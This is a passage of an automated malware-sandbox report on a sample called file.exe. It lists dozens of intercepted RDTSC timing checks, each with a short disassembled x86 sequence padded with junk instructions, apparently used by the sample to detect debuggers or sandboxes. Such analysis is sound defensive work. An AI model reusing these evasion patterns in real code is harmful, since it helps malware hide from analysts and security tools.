                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62919A second address: 62919E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62946E second address: 629476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629476 second address: 62948F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBE44D3A536h 0x0000000a popad 0x0000000b jno 00007FBE44D3A53Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629603 second address: 629609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629609 second address: 629620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE44D3A53Eh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FC5C second address: 62FC64 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FC64 second address: 62FC85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBE44D3A541h 0x00000008 pushad 0x00000009 popad 0x0000000a ja 00007FBE44D3A536h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FC85 second address: 62FC8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FC8B second address: 62FC8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630136 second address: 630144 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63043F second address: 63045D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007FBE44D3A536h 0x0000000b jp 00007FBE44D3A536h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FBE44D3A53Ah 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630713 second address: 630721 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FBE444F40B2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630A32 second address: 630A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630D01 second address: 630D05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6315AF second address: 6315B9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBE44D3A53Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6315B9 second address: 6315C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6315C4 second address: 6315C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6318CE second address: 6318E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE444F40AFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6318E1 second address: 6318E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637884 second address: 6378A1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FBE444F40B2h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6378A1 second address: 6378C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 jmp 00007FBE44D3A549h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6378C3 second address: 6378C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A7AF second address: 63A7B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63AFDC second address: 63AFE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63AFE2 second address: 63AFE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63AFE6 second address: 63B009 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FBE444F40B9h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63B009 second address: 63B026 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44D3A549h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63B1AC second address: 63B1F3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jo 00007FBE444F40A6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007FBE444F40DEh 0x00000014 push edx 0x00000015 jnl 00007FBE444F40A6h 0x0000001b pushad 0x0000001c popad 0x0000001d pop edx 0x0000001e pushad 0x0000001f jmp 00007FBE444F40B4h 0x00000024 jmp 00007FBE444F40B2h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E4AE second address: 63E4CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE44D3A544h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E4CD second address: 63E4D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E4D1 second address: 63E4F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FBE44D3A536h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FBE44D3A53Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007FBE44D3A536h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E4F0 second address: 63E4F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5932E2 second address: 5932ED instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 643EBC second address: 643ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE444F40B1h 0x00000009 jl 00007FBE444F40A6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 643ED9 second address: 643EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 644352 second address: 644358 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6446D2 second address: 6446D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 644B4F second address: 644B99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FBE444F40BCh 0x0000000f push eax 0x00000010 jmp 00007FBE444F40B0h 0x00000015 jmp 00007FBE444F40B3h 0x0000001a pop eax 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 644D03 second address: 644D0D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBE44D3A536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 644E6B second address: 644E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 644E71 second address: 644E81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007FBE44D3A53Ah 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 644E81 second address: 644E86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 644E86 second address: 644E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B752 second address: 64B75F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007FBE444F40A6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64DB70 second address: 64DB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64DB7A second address: 64DB98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64DA16 second address: 64DA1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65A755 second address: 65A759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65A759 second address: 65A774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FBE44D3A53Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007FBE44D3A538h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CC1B second address: 65CC22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CC22 second address: 65CC38 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBE44D3A53Ch 0x00000008 jp 00007FBE44D3A536h 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007FBE44D3A536h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C716 second address: 65C74D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jno 00007FBE444F40A6h 0x0000000c jns 00007FBE444F40A6h 0x00000012 pushad 0x00000013 popad 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 jmp 00007FBE444F40B9h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C74D second address: 65C753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C753 second address: 65C757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C757 second address: 65C779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FBE44D3A536h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FBE44D3A546h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C779 second address: 65C7A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FBE444F40A6h 0x00000009 jmp 00007FBE444F40B8h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C906 second address: 65C90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66A6A9 second address: 66A6AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66A6AD second address: 66A6D9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FBE44D3A53Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FBE44D3A547h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6724CE second address: 6724D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 670EE5 second address: 670F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007FBE44D3A53Eh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 670F02 second address: 670F0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 670F0B second address: 670F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBE44D3A536h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBE44D3A543h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 670F2D second address: 670F3B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FBE444F40A6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6711A4 second address: 6711BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44D3A542h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671682 second address: 671689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67218F second address: 672198 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676D4D second address: 676D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676D55 second address: 676D5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676D5C second address: 676D67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FBE444F40A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6798DD second address: 6798E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6794B8 second address: 6794C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FBE444F40ACh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6930E1 second address: 6930FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44D3A542h 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FBE44D3A536h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 693259 second address: 69326E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FBE444F40ABh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69326E second address: 69328F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE44D3A547h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69328F second address: 693295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 693295 second address: 69329A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A1E94 second address: 6A1E98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A1E98 second address: 6A1E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A1E9E second address: 6A1EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBE444F40AEh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A1EB4 second address: 6A1ECC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push edi 0x00000008 push edx 0x00000009 jmp 00007FBE44D3A53Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A5A9C second address: 6A5AA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A5D9D second address: 6A5DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE44D3A547h 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A5DBE second address: 6A5DC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A5DC2 second address: 6A5DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AC0EA second address: 6AC0F0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AC0F0 second address: 6AC0F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AC0F6 second address: 6AC0FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AC0FA second address: 6AC15E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FBE44D3A538h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 mov dh, F2h 0x00000025 push 00000004h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007FBE44D3A538h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 0000001Ah 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 mov edx, dword ptr [ebp+122D2C58h] 0x00000047 push 33BE5A00h 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f je 00007FBE44D3A536h 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AC3E5 second address: 6AC3EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AD95A second address: 6AD960 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AD960 second address: 6AD966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AFAC4 second address: 6AFAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AFAC8 second address: 6AFAE5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FBE444F40B2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AFAE5 second address: 6AFAF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE44D3A53Ch 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5280303 second address: 5280345 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FBE444F40B6h 0x00000008 jmp 00007FBE444F40B5h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FBE444F40ADh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5280345 second address: 528034B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528034B second address: 528034F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528034F second address: 5280353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
